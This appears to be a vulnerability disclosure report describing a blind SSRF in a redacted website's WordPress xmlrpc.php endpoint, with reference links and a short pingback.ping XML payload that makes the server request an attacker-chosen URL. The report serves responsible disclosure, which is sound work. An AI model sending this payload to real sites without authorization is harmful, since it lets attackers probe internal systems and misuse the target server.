Description:
Hi team,
I would like to report a security vulnerability I discovered on your website. I was able to perform Server-Side Request Forgery (SSRF) attacks via the xmlrpc.php file at https://████████ endpoint.
Using a simple POST request to the xmlrpc.php endpoint, I was able to bypass input validation and send a request to an external URL.
I have attached a proof of concept (PoC) script that demonstrates this vulnerability. It sends a request to my VPS server using interact.sh client (https://github.com/projectdiscovery/interactsh), but an attacker could use this technique to send requests to any URL of their choosing.
https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/
https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/
The vulnerability could be used to conduct further attacks, such as accessing internal systems or exfiltrating sensitive data.
███████
XML-RPC server accepts POST requests only.
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>https://your server</string></value>
</param>
<param>
<value><string>https://█████/</string></value>
</param>
</params>
</methodCall>
I would recommend implementing input validation and filtering to prevent these types of attacks in the future. Please let me know if you require any additional information or if you have any questions.